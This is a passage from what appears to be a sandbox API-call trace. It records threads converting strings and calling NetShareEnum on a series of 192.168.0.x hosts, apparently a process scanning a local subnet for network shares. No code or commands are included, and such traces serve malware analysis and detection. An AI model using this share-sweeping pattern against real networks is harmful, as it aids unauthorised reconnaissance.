lpWideCharStr="\\\\192.168.0.158", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.254] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.158", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.158", lpUsedDefaultChar=0x0) returned 15 [0178.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5e1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.254] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.254] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.254] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5e1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.254] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.254] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.254] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x5e1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5e1fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.258] NetShareEnum (in: servername="\\\\192.168.0.158", level=0x1, bufptr=0x5e1fedc, prefmaxlen=0xffffffff, entriesread=0x5e1fed4, totalentries=0x5e1fed0, resume_handle=0x5e1fecc | out: bufptr=0x5e1fedc, entriesread=0x5e1fed4, totalentries=0x5e1fed0, resume_handle=0x5e1fecc) returned 0x35 [0211.212] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.251", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.212] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.251", cchWideChar=15, lpMultiByteStr=0x1e8330c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.251", lpUsedDefaultChar=0x0) returned 15 [0211.212] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x5e1fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5e1fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.414] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5e1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.414] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.414] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.414] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5e1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.414] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.414] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.414] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x5e1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5e1fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.420] NetShareEnum (in: servername="\\\\192.168.0.251", level=0x1, bufptr=0x5e1fedc, prefmaxlen=0xffffffff, entriesread=0x5e1fed4, totalentries=0x5e1fed0, resume_handle=0x5e1fecc | out: bufptr=0x5e1fedc, entriesread=0x5e1fed4, totalentries=0x5e1fed0, resume_handle=0x5e1fecc) returned 0x35 [0258.074] SetEvent (hEvent=0x1dc) returned 1 [0258.074] RtlExitUserThread (Status=0x0) Thread: id = 69 os_tid = 0xcbc [0088.992] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.48", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.992] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.48", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.48", lpUsedDefaultChar=0x0) returned 14 [0088.992] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5f5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.992] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.992] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.992] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5f5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.992] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.992] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.992] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x5f5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5f5fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.994] NetShareEnum (in: servername="\\\\192.168.0.48", level=0x1, bufptr=0x5f5fedc, prefmaxlen=0xffffffff, entriesread=0x5f5fed4, totalentries=0x5f5fed0, resume_handle=0x5f5fecc | out: bufptr=0x5f5fedc, entriesread=0x5f5fed4, totalentries=0x5f5fed0, resume_handle=0x5f5fecc) returned 0x35 [0144.395] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.107", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.395] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.107", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.107", lpUsedDefaultChar=0x0) returned 15 [0144.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5f5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.395] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.395] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5f5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.395] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.395] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.395] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x5f5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5f5fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.399] NetShareEnum (in: servername="\\\\192.168.0.107", level=0x1, bufptr=0x5f5fedc, prefmaxlen=0xffffffff, entriesread=0x5f5fed4, totalentries=0x5f5fed0, resume_handle=0x5f5fecc | out: bufptr=0x5f5fedc, entriesread=0x5f5fed4, totalentries=0x5f5fed0, resume_handle=0x5f5fecc) returned 0x35 [0178.246] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.157", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.246] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.157", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.157", lpUsedDefaultChar=0x0) returned 15 [0178.246] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5f5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.248] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.248] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.248] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5f5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.248] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.248] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.248] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x5f5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5f5fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.252] NetShareEnum (in: servername="\\\\192.168.0.157", level=0x1, bufptr=0x5f5fedc, prefmaxlen=0xffffffff, entriesread=0x5f5fed4, totalentries=0x5f5fed0, resume_handle=0x5f5fecc | out: bufptr=0x5f5fedc, entriesread=0x5f5fed4, totalentries=0x5f5fed0, resume_handle=0x5f5fecc) returned 0x35 [0211.211] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.250", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.211] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.250", cchWideChar=15, lpMultiByteStr=0x1e832ec, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.250", lpUsedDefaultChar=0x0) returned 15 [0211.211] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x5f5fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5f5fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.486] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5f5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.486] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.487] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.487] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x5f5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.487] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.487] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.487] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x5f5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x5f5fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.487] NetShareEnum (in: servername="\\\\192.168.0.250", level=0x1, bufptr=0x5f5fedc, prefmaxlen=0xffffffff, entriesread=0x5f5fed4, totalentries=0x5f5fed0, resume_handle=0x5f5fecc | out: bufptr=0x5f5fedc, entriesread=0x5f5fed4, totalentries=0x5f5fed0, resume_handle=0x5f5fecc) returned 0x35 [0258.081] SetEvent (hEvent=0x1dc) returned 1 [0258.081] RtlExitUserThread (Status=0x0) Thread: id = 70 os_tid = 0xcc0 [0088.994] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.49", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.994] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.49", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.49", lpUsedDefaultChar=0x0) returned 14 [0088.994] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x609ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.994] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.994] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.994] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x609ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.995] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.995] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.995] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x609fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x609fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.995] NetShareEnum (in: servername="\\\\192.168.0.49", level=0x1, bufptr=0x609fedc, prefmaxlen=0xffffffff, entriesread=0x609fed4, totalentries=0x609fed0, resume_handle=0x609fecc | out: bufptr=0x609fedc, entriesread=0x609fed4, totalentries=0x609fed0, resume_handle=0x609fecc) returned 0x35 [0144.366] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.104", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.366] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.104", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.104", lpUsedDefaultChar=0x0) returned 15 [0144.366] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x609ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.366] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.366] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.366] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x609ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.366] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.366] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.366] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x609fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x609fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.370] NetShareEnum (in: servername="\\\\192.168.0.104", level=0x1, bufptr=0x609fedc, prefmaxlen=0xffffffff, entriesread=0x609fed4, totalentries=0x609fed0, resume_handle=0x609fecc | out: bufptr=0x609fedc, entriesread=0x609fed4, totalentries=0x609fed0, resume_handle=0x609fecc) returned 0x35 [0178.240] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.156", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.240] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.156", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.156", lpUsedDefaultChar=0x0) returned 15 [0178.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x609ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.240] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.240] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x609ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.240] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.240] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.240] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x609fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x609fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.241] NetShareEnum (in: servername="\\\\192.168.0.156", level=0x1, bufptr=0x609fedc, prefmaxlen=0xffffffff, entriesread=0x609fed4, totalentries=0x609fed0, resume_handle=0x609fecc | out: bufptr=0x609fedc, entriesread=0x609fed4, totalentries=0x609fed0, resume_handle=0x609fecc) returned 0x35 [0211.211] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.249", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.211] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.249", cchWideChar=15, lpMultiByteStr=0x1e832cc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.249", lpUsedDefaultChar=0x0) returned 15 [0211.211] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x609fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x609fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x609ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.405] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.405] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x609ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.405] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, 